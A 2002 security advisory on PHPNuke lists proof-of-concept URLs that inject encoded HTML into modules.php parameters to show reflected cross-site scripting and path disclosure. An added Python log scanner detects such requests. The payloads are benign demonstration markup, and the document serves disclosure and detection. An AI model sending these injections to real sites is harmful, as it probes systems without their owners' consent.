
PHPNuke - Multiple cross site scripting and path discovery bugs
24th Apr 2002 [SBWID-5307]
COMMAND

	Multiple cross site scripting and path discovery bugs in PHPNuke

SYSTEMS AFFECTED

	??

PROBLEM

	Rodrigo Gutierrez [http://www.trustix.com] posted the following URLs as
	holding XSS and path discovery bugs:

	http://nuke/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=%22%3Ch1%3EI%20Love%20XSS%3C/h1%3E

	http://nuke/modules.php?name=Classifieds&op=ViewAds&id_catg=%22%3Ch1%3ESmelly%20socks%20category%3C/h1%3E&id_subcatg=75

	http://nuke/modules.php?op=modload&name=Guestbook&file=index&entry=%22%3Ch1%3Etest%3C/h1%3E

	http://nuke/modules.php?name=Your_Account&op=userinfo&uname=%22%3Ch1%3Etest%20123%3C/h1%3E

	http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=Replugge%20Love%20PHPNuke%20

	http://nuke/modules.php?name=Stories_Archive&sa=show_month&year=Love%20this&month=3&month_l=Replugge

	http://nuke/modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E

	http://nuke/modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3EBugger%20You%3C/h1%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownload

	http://nuke/modules.php?name=Downloads&d_op=viewdownload&%22%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=

	http://nuke/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here

	http://nuke/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E

	http://nuke/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E

	http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E
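	Every URL above shares one shape: a modules.php request whose parameter
	carries percent-encoded markup (%22%3C ... %3E), or, for the path
	discovery variants, a parameter that is empty or otherwise not what the
	module expects. The script below is an added example, not code from this
	advisory, from Trustix or from the PHPNuke project: it decodes the query
	string of web-server log lines and flags requests matching those two
	patterns. The log lines are constructed for the example, and treating
	a blank parameter value on modules.php as a weak path-disclosure signal
	is an assumption, since the advisory does not say which values trigger
	the disclosure.

```python
"""Flag web-server log entries whose decoded query parameters carry HTML
markup, or are left blank, on PHPNuke's modules.php (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines in NCSA common format; not from a real server.
# Requests 1, 4 and 5 reuse payload shapes from the advisory above.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Apr/2002:10:00:01 +0000] "GET /modules.php?name=Surveys&pollID=%22%3Ch1%3Etest%3C/h1%3E HTTP/1.0" 200 5120
10.0.0.6 - - [24/Apr/2002:10:00:02 +0000] "GET /modules.php?name=Downloads&d_op=viewdownload&cid=12 HTTP/1.0" 200 4096
10.0.0.7 - - [24/Apr/2002:10:00:03 +0000] "GET /modules.php?name=Downloads&d_op=viewdownload&cid= HTTP/1.0" 200 2048
10.0.0.8 - - [24/Apr/2002:10:00:04 +0000] "GET /modules.php?op=modload&name=WebChat&file=index&roomid=%22%3Ch1%3EBugger%20You%3C/h1%3E HTTP/1.0" 200 3000
10.0.0.9 - - [24/Apr/2002:10:00:05 +0000] "GET /modules.php?name=Downloads&d_op=viewdownload&%22%3E HTTP/1.0" 200 2048
"""

# Request line inside the quoted part of an NCSA log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# After percent-decoding: the start of an HTML tag (<h1, </h1) or a
# quote-then-close-bracket ("> ) used to break out of an attribute value.
MARKUP_RE = re.compile(r'<\s*/?[a-zA-Z]|"\s*>')


def decoded_params(target):
    """Percent-decoded (name, value) pairs of the request target's query string.
    keep_blank_values=True so that 'cid=' and a bare '%22%3E' survive."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def markup_params(target):
    """Names of parameters whose decoded name or value contains markup."""
    return [k for k, v in decoded_params(target)
            if MARKUP_RE.search(k) or MARKUP_RE.search(v)]


def blank_params(target):
    """Names of parameters sent with an empty value (assumed heuristic for
    the path-disclosure variants in the advisory)."""
    return [k for k, v in decoded_params(target) if v == ""]


def scan_log(text):
    """Return (client_ip, label, parameter_names) for each flagged request.
    A request is reported once: markup takes precedence over blank values."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or not urlsplit(m.group("target")).path.endswith("modules.php"):
            continue
        target = m.group("target")
        client_ip = line.split(" ", 1)[0]
        tagged = markup_params(target)
        if tagged:
            findings.append((client_ip, "xss-markup", tagged))
            continue
        blank = blank_params(target)
        if blank:
            findings.append((client_ip, "blank-param", blank))
    return findings


if __name__ == "__main__":
    for client_ip, label, names in scan_log(SAMPLE_LOG):
        print(f"{client_ip}\t{label}\t{', '.join(names)}")
```

	Decoding before matching is the important step: the raw log contains
	only %22%3C sequences, so a pattern written against literal "<h1>"
	would miss every request listed in this advisory. On the application
	side the same reflected values are neutralised by passing them through
	htmlspecialchars() before they are echoed back into the page.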


SOLUTION

	None yet?
